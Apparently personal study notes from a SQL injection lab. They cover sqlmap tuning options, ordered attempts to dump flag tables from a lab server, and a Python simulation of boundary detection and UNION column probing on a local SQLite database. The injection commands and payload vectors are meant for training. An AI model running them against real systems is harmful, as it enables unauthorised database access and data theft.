# Basic Tuning

- Every payload sent to the target consists of:
    - vector (e.g., `UNION ALL SELECT 1,2,VERSION()`): the central part of the payload, carrying the SQL code to be executed at the target
    - boundaries (e.g., `'<vector>-- -`): prefix and suffix formations, used for proper injection of the vector into the vulnerable SQL statement
- In rare cases that are not covered by a regular SQLMap run, special prefix and suffix values are required
- The `--prefix` and `--suffix` options can be used as follows; this encloses every vector between the static prefix `%'))` and the suffix `-- -`

```bash
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
```

- By default, SQLMap combines a predefined set of the most common boundaries (i.e., prefix/suffix pairs) with the vectors that have a high chance of success against a vulnerable target
- The option `--level` (`1-5`, default `1`) extends both the vectors and the boundaries used, based on their expectancy of success (i.e., the lower the expectancy, the higher the level)
- The option `--risk` (`1-3`, default `1`) extends the vector set based on the risk of causing problems at the target side (i.e., risk of database entry loss or denial of service)

# Advanced Tuning

- Status codes
    - The option `--code` can be used to fix the detection of `TRUE` responses to a specific HTTP status code (e.g., `--code=200`)
- Titles
    - The switch `--titles` instructs the detection mechanism to base the comparison on the content of the HTML `<title>` tag
- Strings
    - The option `--string` bases the detection only on the appearance of a single value in the response (e.g., `--string=success`)
- Text-only
    - The `--text-only` switch removes all HTML tags and bases the comparison only on the textual (i.e., visible) content
- Technique selection
    - To skip the time-based blind and stacked-query payloads and only test boolean-based blind, error-based and UNION-query payloads, specify the techniques with `--technique=BEU`
- UNION tuning
    - If the exact number of columns of the vulnerable SQL query can be found manually, it can be given to SQLMap with the option `--union-cols` (e.g., `--union-cols=17`)
    - If the default "dummy" filling values used by SQLMap (`NULL` and a random integer) are not compatible with the values returned by the vulnerable SQL query, an alternative value can be specified (e.g., `--union-char='a'`)
    - If a `FROM <table>` appendix is required at the end of a `UNION` query (e.g., in the case of Oracle), it can be set with the option `--union-from` (e.g., `--union-from=users`)

# Exercise

## Case 5 - Detect and exploit (OR) SQLi vulnerability in GET parameter id

```bash
sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --method GET --batch --dump
```

![[images/Pasted image 20251208194152.png]]

- Second attempt with prefix

```bash
sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --method GET --batch --dump --prefix="')"
```

![[images/Pasted image 20251208194335.png]]

- Third attempt with higher level/risk values
    - Failure; honestly too many tests

```bash
sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --method GET --batch --dump --prefix="')" --risk=3 --level=3
```

- Fourth attempt with hints

```bash
sqlmap -u "http://94.237.56.99:54442/case5.php" --data='id=1' --prefix=")" -T flag5 --no-cast
```

![[images/Pasted image 20251208195013.png]]

- Fifth attempt > success
    - Boolean-based blind injection

```bash
sqlmap -u 'http://94.237.56.99:54442/case5.php?id=*' --level 5 --risk 3 -T flag5 --batch --dump
```

![[images/Pasted image 20251208195614.png]]

## Case 6 - Detect and exploit SQLi vulnerability in GET parameter col having non-standard boundaries

```bash
sqlmap -u 'http://94.237.56.99:54442/case6.php' --data="col=id*" --level 5 --prefix=")" --batch --dump
```

![[images/Pasted image 20251208200622.png]]

- Second attempt

```bash
sqlmap -u 'http://94.237.56.99:54442/case6.php?col=*' --level 5 --prefix=")" --batch --dump
```

![[images/Pasted image 20251208200933.png]]

- Third attempt using hint

```bash
sqlmap -u 'http://94.237.56.99:54442/case6.php?col=id' --prefix='`)' --batch -T flag6 --dump
```

![[images/Pasted image 20251208200909.png]]

## Case 7 - Detect and exploit SQLi vulnerability in GET parameter id by usage of UNION query-based technique

```bash
sqlmap -u 'http://94.237.56.99:54442/case7.php?id=*' --batch -T flag7 --dump --technique=U
```

![[images/Pasted image 20251208201208.png]]

- Second attempt > increase risk/level

```bash
sqlmap -u 'http://94.237.56.99:54442/case7.php?id=*' --batch -T flag7 --dump --technique=U --level=3 --risk=3
```

![[images/Pasted image 20251208201323.png]]

- Third attempt > use hint
    - Getting closer

![[images/Pasted image 20251208201542.png]]

- Fourth attempt > increase risk value

```bash
sqlmap -u 'http://94.237.56.99:54442/case7.php?id=*' --batch --dump --union-cols=5 --no-cast --risk=3
```

![[images/Pasted image 20251208201641.png]]
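The boundary/vector model from the Basic Tuning section and the column-count probing that `--union-cols` short-circuits, as an added example that is not part of the original notes or of SQLMap's own code. It simulates in Python, against an in-memory SQLite database, what sqlmap does when it tries prefix/suffix pairs with a TRUE and a FALSE vector and when it grows a `UNION ALL SELECT NULL,...` vector one column at a time. sqlmap compares HTTP responses (optionally narrowed with `--string`, `--titles` or `--text-only`); comparing returned rows stands in for that here. The vulnerable statement shapes, the `users` table and its rows, and the candidate boundary list are constructed assumptions for this example; the third candidate pair is the `%'))` / `-- -` pair from the `--prefix`/`--suffix` example above.

```python
import sqlite3

# Constructed vulnerable statement shapes (assumptions for this example):
# {} marks where the application concatenates the untrusted parameter.
TEMPLATES = {
    "plain_quote": "SELECT name FROM users WHERE name = '{}'",
    "quote_paren": "SELECT name FROM users WHERE name = ('{}')",
    "like_double_paren": "SELECT name FROM users WHERE name LIKE (('%{}%'))",
    "three_cols": "SELECT id, name, length(name) FROM users WHERE name = ('{}')",
}

# Candidate boundaries (prefix, suffix), tried in order like sqlmap's
# built-in boundary list; sqlmap ships many more, these three are constructed.
CANDIDATE_BOUNDARIES = [("'", "-- -"), ("')", "-- -"), ("%'))", "-- -")]


def make_db():
    """In-memory SQLite database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
    return conn


def build_payload(prefix, vector, suffix):
    """A payload is the vector wrapped in its boundaries: prefix + vector + suffix."""
    return f"{prefix}{vector}{suffix}"


def run(conn, template, user_input):
    """Concatenate the input into the template the way the vulnerable app would
    and return ('ok', rows) or ('error', message) for the resulting statement."""
    sql = template.format(user_input)
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "error", str(exc)


def detect_boundary(conn, template, baseline="alice", candidates=CANDIDATE_BOUNDARIES):
    """Boolean-based detection: the first prefix/suffix pair whose TRUE and FALSE
    vectors both parse and yield different result sets is the working boundary.
    A pair that breaks the statement's quoting or parentheses errors out and is skipped."""
    for prefix, suffix in candidates:
        true_input = baseline + build_payload(prefix, " OR 1=1", suffix)
        false_input = baseline + build_payload(prefix, " AND 1=2", suffix)
        t_status, t_rows = run(conn, template, true_input)
        f_status, f_rows = run(conn, template, false_input)
        if t_status == "ok" and f_status == "ok" and t_rows != f_rows:
            return prefix, suffix
    return None


def find_union_cols(conn, template, prefix, suffix, max_cols=10, filler="NULL"):
    """What --union-cols lets you skip: grow a UNION ALL SELECT with one filler
    column at a time until the database accepts the column count. `filler`
    plays the role of --union-char (NULL is sqlmap's default dummy value)."""
    for n in range(1, max_cols + 1):
        vector = " UNION ALL SELECT " + ",".join([filler] * n)
        status, _ = run(conn, template, "x" + build_payload(prefix, vector, suffix))
        if status == "ok":
            return n
    return None


if __name__ == "__main__":
    db = make_db()
    for name, template in TEMPLATES.items():
        boundary = detect_boundary(db, template)
        cols = find_union_cols(db, template, *boundary) if boundary else None
        print(f"{name:18} boundary={boundary!r:16} union_cols={cols}")
```

Running the script shows that the same `OR 1=1` vector only becomes valid SQL once it is wrapped in the boundary matching the statement shape (`'` for a plain quoted value, `')` for a quoted value inside parentheses, `%'))` for a `LIKE` pattern inside two parentheses), which is exactly the situation the `--prefix` values in the exercises above resolve, and that the column count found by trial is the number you would pass as `--union-cols`.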